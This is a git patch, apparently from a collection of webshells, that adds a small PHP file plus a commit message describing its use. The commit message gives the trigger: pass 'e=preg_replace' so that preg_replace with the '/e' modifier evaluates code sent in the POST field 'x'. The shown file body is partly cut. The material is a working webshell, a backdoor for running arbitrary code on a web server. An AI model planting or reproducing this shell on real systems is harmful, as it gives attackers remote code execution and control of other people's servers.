From 44282fe4126171720da97efb72d1f4bbe396efb2 Mon Sep 17 00:00:00 2001 From: tennc <670357+tennc@users.noreply.github.com> Date: Thu, 20 Aug 2020 12:38:26 +0800 Subject: [PATCH] Create 2020.08.20.13.php shell.php?e=preg_replace ==> preg_replace('|.*|e',$_POST['x'],'') use: post x=phpinfo(); from: https://www.sqlsec.com/2020/07/shell.html --- php/2020.08.20.13.php | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 php/2020.08.20.13.php diff --git a/php/2020.08.20.13.php b/php/2020.08.20.13.php new file mode 100644 index 0000000..6ed4f08 --- /dev/null +++ b/php/2020.08.20.13.php @@ -0,0 +1,5 @@ + '|.*|e',); + array_walk($arr, $e, ''); +?>